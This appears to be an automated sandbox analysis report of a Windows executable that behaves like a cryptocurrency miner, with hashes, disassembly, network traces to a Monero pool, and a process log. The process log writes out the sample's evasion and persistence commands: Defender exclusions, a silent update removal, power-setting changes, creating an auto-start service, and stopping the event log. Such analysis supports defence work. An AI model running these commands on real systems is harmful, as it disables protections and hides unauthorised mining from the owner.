                                                      Size (bytes):64
                                                      Entropy (8bit):0.34726597513537405
                                                      Encrypted:false
                                                      SSDEEP:3:Nlll:Nll
                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                      Malicious:false
                                                      Preview:@...e...........................................................
                                                      Process:C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe
                                                      File Type:PE32+ executable (native) x86-64, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):14544
                                                      Entropy (8bit):6.2660301556221185
                                                      Encrypted:false
                                                      SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                      MD5:0C0195C48B6B8582FA6F6373032118DA
                                                      SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                      SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                      SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                      Malicious:true
Antivirus:
• ReversingLabs, Detection: 5%
Joe Sandbox View (other samples that dropped a file with this hash):
• Filename: Ky4J8k89A7.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: boooba.exe, Detection: malicious
• Filename: SecuriteInfo.com.Trojan.Siggen29.1091.20762.15518.exe, Detection: malicious
• Filename: 2HUgVjrn3O.exe, Detection: malicious
• Filename: SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe, Detection: malicious
• Filename: Yf4yviDxwF.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe, Detection: malicious
• Filename: prog.exe, Detection: malicious
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                      File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                      Entropy (8bit):6.547140340840566
                                                      TrID:
                                                      • Win64 Executable GUI (202006/5) 92.65%
                                                      • Win64 Executable (generic) (12005/4) 5.51%
                                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                                      • DOS Executable Generic (2002/1) 0.92%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:12Jh49DCAj.exe
                                                      File size:2'630'144 bytes
                                                      MD5:a44c57ded5f0e75dd398f8bde8c83219
                                                      SHA1:b46a7f6d001c9e06b7dcc39a926130fb791f4663
                                                      SHA256:003342f9137c04ac86b94e7798a9b0ebe7cff13524bb191f7ac2472a059b442d
                                                      SHA512:244d584d9ad19123c5d251b1347449460fc3c47b61de7a9880af87ffadabdbe0270cb75b972907bf534f50aebe341d7ec77cb586f51c6bb02a3524197f39e031
                                                      SSDEEP:49152:KMv8tD+YOamKt4XZo5SUUxf8FnXVj7mJ5Ls6il6Sqd:/v8t+YJqUU2hXAJ5Lg6Sqd
                                                      TLSH:B3C533C9262D54B9DBCF8038C6C56F37B69D3875671209CE8EE050311BF4ADCA8789E9
                                                      File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...-( g.........."......|....'.....@..........@..............................(.......(...`........................................
                                                      Icon Hash:00928e8e8686b000
                                                      Entrypoint:0x140001140
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x140000000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x6720282D [Tue Oct 29 00:11:25 2024 UTC]
                                                      TLS Callbacks:0x40001760, 0x1, 0x400017e0, 0x1
                                                      CLR (.Net) Version:
                                                      OS Version Major:6
                                                      OS Version Minor:0
                                                      File Version Major:6
                                                      File Version Minor:0
                                                      Subsystem Version Major:6
                                                      Subsystem Version Minor:0
                                                      Import Hash:de41d4e0545d977de6ca665131bb479a
Entrypoint disassembly (instructions):
                                                      dec eax
                                                      sub esp, 28h
                                                      dec eax
                                                      mov eax, dword ptr [00007ED5h]
                                                      mov dword ptr [eax], 00000001h
                                                      call 00007F0F3CB879CFh
                                                      nop
                                                      nop
                                                      nop
                                                      dec eax
                                                      add esp, 28h
                                                      ret
                                                      nop
                                                      inc ecx
                                                      push edi
                                                      inc ecx
                                                      push esi
                                                      push esi
                                                      push edi
                                                      push ebx
                                                      dec eax
                                                      sub esp, 20h
                                                      dec eax
                                                      mov eax, dword ptr [00000030h]
                                                      dec eax
                                                      mov edi, dword ptr [eax+08h]
                                                      dec eax
                                                      mov esi, dword ptr [00007EC9h]
                                                      xor eax, eax
                                                      dec eax
                                                      cmpxchg dword ptr [esi], edi
                                                      sete bl
                                                      je 00007F0F3CB879F0h
                                                      dec eax
                                                      cmp edi, eax
                                                      je 00007F0F3CB879EBh
                                                      dec esp
                                                      mov esi, dword ptr [00009669h]
                                                      nop word ptr [eax+eax+00000000h]
                                                      mov ecx, 000003E8h
                                                      inc ecx
                                                      call esi
                                                      xor eax, eax
                                                      dec eax
                                                      cmpxchg dword ptr [esi], edi
                                                      sete bl
                                                      je 00007F0F3CB879C7h
                                                      dec eax
                                                      cmp edi, eax
                                                      jne 00007F0F3CB879A9h
                                                      dec eax
                                                      mov edi, dword ptr [00007E90h]
                                                      mov eax, dword ptr [edi]
                                                      cmp eax, 01h
                                                      jne 00007F0F3CB879CEh
                                                      mov ecx, 0000001Fh
                                                      call 00007F0F3CB8F074h
                                                      jmp 00007F0F3CB879E9h
                                                      cmp dword ptr [edi], 00000000h
                                                      je 00007F0F3CB879CBh
                                                      mov byte ptr [002817C9h], 00000001h
                                                      jmp 00007F0F3CB879DBh
                                                      mov dword ptr [edi], 00000001h
                                                      dec eax
                                                      mov ecx, dword ptr [00007E7Ah]
                                                      dec eax
                                                      mov edx, dword ptr [00007E7Bh]
                                                      call 00007F0F3CB8F06Bh
                                                      mov eax, dword ptr [edi]
                                                      cmp eax, 01h
                                                      jne 00007F0F3CB879DBh
                                                      dec eax
                                                      mov ecx, dword ptr [00007E50h]
Data directories:
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa538 | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x287000 | 0x10 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x284000 | 0x180 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x288000 | 0x78 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x90a0 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x9410 | 0x138 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0xa6d0 | 0x158 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Sections:
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x7a06 | 0x7c00 | 538cbceef9250d3a85472682959dfbff | False | 0.5035912298387096 | data | 6.171302852555024 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9000 | 0x1c80 | 0x1e00 | fcf3a89560e8c1b62b73b6fe1827ecaf | False | 0.4412760416666667 | zlib compressed data | 4.602205049073675 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xb000 | 0x278860 | 0x277a00 | 329bf0a445fe3e6112c486e30f1502ce | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x284000 | 0x180 | 0x200 | 85b24f652d2029208ae18728cbfe42fe | False | 0.50390625 | data | 3.137358409693989 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.00cfg | 0x285000 | 0x10 | 0x200 | b18c7380298e104adf73576fa46bccc1 | False | 0.04296875 | data | 0.15127132530476972 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls | 0x286000 | 0x10 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x287000 | 0x10 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x288000 | 0x78 | 0x200 | 6b0d02e3b9bf86dfff1065655fe64131 | False | 0.232421875 | data | 1.4178553129526903 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Imports:
DLL | Imported functions
msvcrt.dll | __C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, memset, signal, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp
KERNEL32.dll | DeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery
Network IDS alerts:
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-31T20:11:20.574099+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 172.202.163.200 | 443 | 192.168.2.6 | 49746 | TCP
2024-10-31T20:11:58.857779+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 172.202.163.200 | 443 | 192.168.2.6 | 49952 | TCP
TCP packets (per-packet trace):
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                      Oct 31, 2024 20:14:04.381408930 CET4971010343192.168.2.654.37.232.103
                                                      Oct 31, 2024 20:14:04.488863945 CET103434971054.37.232.103192.168.2.6
                                                      Oct 31, 2024 20:14:04.488970995 CET4971010343192.168.2.654.37.232.103
                                                      Oct 31, 2024 20:14:14.189049959 CET103434971054.37.232.103192.168.2.6
                                                      Oct 31, 2024 20:14:14.374641895 CET4971010343192.168.2.654.37.232.103
                                                      Oct 31, 2024 20:14:24.169471025 CET103434971054.37.232.103192.168.2.6
                                                      Oct 31, 2024 20:14:24.374628067 CET4971010343192.168.2.654.37.232.103
                                                      Oct 31, 2024 20:14:34.151727915 CET103434971054.37.232.103192.168.2.6
                                                      Oct 31, 2024 20:14:34.374646902 CET4971010343192.168.2.654.37.232.103
                                                      Oct 31, 2024 20:14:44.193420887 CET103434971054.37.232.103192.168.2.6
                                                      Oct 31, 2024 20:14:44.374658108 CET4971010343192.168.2.654.37.232.103
                                                      Oct 31, 2024 20:14:54.233042955 CET103434971054.37.232.103192.168.2.6
                                                      Oct 31, 2024 20:14:54.280483961 CET4971010343192.168.2.654.37.232.103
                                                      Oct 31, 2024 20:15:04.244034052 CET103434971054.37.232.103192.168.2.6
                                                      Oct 31, 2024 20:15:04.376812935 CET4971010343192.168.2.654.37.232.103
                                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                      Oct 31, 2024 20:11:09.671679020 CET | 55469 | 53 | 192.168.2.6 | 1.1.1.1
                                                      Oct 31, 2024 20:11:09.679805040 CET | 53 | 55469 | 1.1.1.1 | 192.168.2.6

                                                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                      Oct 31, 2024 20:11:09.671679020 CET | 192.168.2.6 | 1.1.1.1 | 0x9935 | Standard query (0) | xmr-eu1.nanopool.org | A (IP address) | IN (0x0001) | false

                                                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                      Oct 31, 2024 20:11:09.679805040 CET | 1.1.1.1 | 192.168.2.6 | 0x9935 | No error (0) | xmr-eu1.nanopool.org |  | 51.15.65.182 | A (IP address) | IN (0x0001) | false
                                                      Oct 31, 2024 20:11:09.679805040 CET | 1.1.1.1 | 192.168.2.6 | 0x9935 | No error (0) | xmr-eu1.nanopool.org |  | 51.15.58.224 | A (IP address) | IN (0x0001) | false
                                                      Oct 31, 2024 20:11:09.679805040 CET | 1.1.1.1 | 192.168.2.6 | 0x9935 | No error (0) | xmr-eu1.nanopool.org |  | 146.59.154.106 | A (IP address) | IN (0x0001) | false
                                                      Oct 31, 2024 20:11:09.679805040 CET | 1.1.1.1 | 192.168.2.6 | 0x9935 | No error (0) | xmr-eu1.nanopool.org |  | 212.47.253.124 | A (IP address) | IN (0x0001) | false
                                                      Oct 31, 2024 20:11:09.679805040 CET | 1.1.1.1 | 192.168.2.6 | 0x9935 | No error (0) | xmr-eu1.nanopool.org |  | 54.37.137.114 | A (IP address) | IN (0x0001) | false
                                                      Oct 31, 2024 20:11:09.679805040 CET | 1.1.1.1 | 192.168.2.6 | 0x9935 | No error (0) | xmr-eu1.nanopool.org |  | 51.15.193.130 | A (IP address) | IN (0x0001) | false
                                                      Oct 31, 2024 20:11:09.679805040 CET | 1.1.1.1 | 192.168.2.6 | 0x9935 | No error (0) | xmr-eu1.nanopool.org |  | 54.37.232.103 | A (IP address) | IN (0x0001) | false
                                                      Oct 31, 2024 20:11:09.679805040 CET | 1.1.1.1 | 192.168.2.6 | 0x9935 | No error (0) | xmr-eu1.nanopool.org |  | 162.19.224.121 | A (IP address) | IN (0x0001) | false
                                                      Oct 31, 2024 20:11:09.679805040 CET | 1.1.1.1 | 192.168.2.6 | 0x9935 | No error (0) | xmr-eu1.nanopool.org |  | 163.172.154.142 | A (IP address) | IN (0x0001) | false
                                                      Oct 31, 2024 20:11:09.679805040 CET | 1.1.1.1 | 192.168.2.6 | 0x9935 | No error (0) | xmr-eu1.nanopool.org |  | 51.89.23.91 | A (IP address) | IN (0x0001) | false
                                                      Oct 31, 2024 20:11:09.679805040 CET | 1.1.1.1 | 192.168.2.6 | 0x9935 | No error (0) | xmr-eu1.nanopool.org |  | 141.94.23.83 | A (IP address) | IN (0x0001) | false

                                                      Target ID:0
                                                      Start time:15:11:02
                                                      Start date:31/10/2024
                                                      Path:C:\Users\user\Desktop\12Jh49DCAj.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\user\Desktop\12Jh49DCAj.exe"
                                                      Imagebase:0x7ff6c5320000
                                                      File size:2'630'144 bytes
                                                      MD5 hash:A44C57DED5F0E75DD398F8BDE8C83219
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:1
                                                      Start time:15:11:02
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:2
                                                      Start time:15:11:02
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:5
                                                      Start time:15:11:05
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                      Imagebase:0x7ff79ade0000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:6
                                                      Start time:15:11:05
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                      Imagebase:0x7ff73bd10000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:7
                                                      Start time:15:11:05
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:8
                                                      Start time:15:11:05
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                      Imagebase:0x7ff73bd10000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:9
                                                      Start time:15:11:05
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:10
                                                      Start time:15:11:05
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                      Imagebase:0x7ff73bd10000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:11
                                                      Start time:15:11:05
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:12
                                                      Start time:15:11:05
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                      Imagebase:0x7ff73bd10000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:13
                                                      Start time:15:11:05
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe delete "ODTUTVYC"
                                                      Imagebase:0x7ff7e0890000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:14
                                                      Start time:15:11:05
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:15
                                                      Start time:15:11:05
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:16
                                                      Start time:15:11:05
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:17
                                                      Start time:15:11:05
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\wusa.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                      Imagebase:0x7ff6e3d00000
                                                      File size:345'088 bytes
                                                      MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:18
                                                      Start time:15:11:05
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe create "ODTUTVYC" binpath= "C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe" start= "auto"
                                                      Imagebase:0x7ff7e0890000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:19
                                                      Start time:15:11:05
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:20
                                                      Start time:15:11:06
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                      Imagebase:0x7ff7e0890000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:21
                                                      Start time:15:11:06
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe start "ODTUTVYC"
                                                      Imagebase:0x7ff7e0890000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:22
                                                      Start time:15:11:06
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:23
                                                      Start time:15:11:06
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:24
                                                      Start time:15:11:06
                                                      Start date:31/10/2024
                                                      Path:C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe
                                                      Imagebase:0x7ff759bf0000
                                                      File size:2'630'144 bytes
                                                      MD5 hash:A44C57DED5F0E75DD398F8BDE8C83219
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 63%, ReversingLabs
                                                      Has exited:true

                                                      Target ID:25
                                                      Start time:15:11:06
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:26
                                                      Start time:15:11:06
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:27
                                                      Start time:15:11:08
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                      Imagebase:0x7ff79ade0000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:28
                                                      Start time:15:11:08
                                                      Start date:31/10/2024
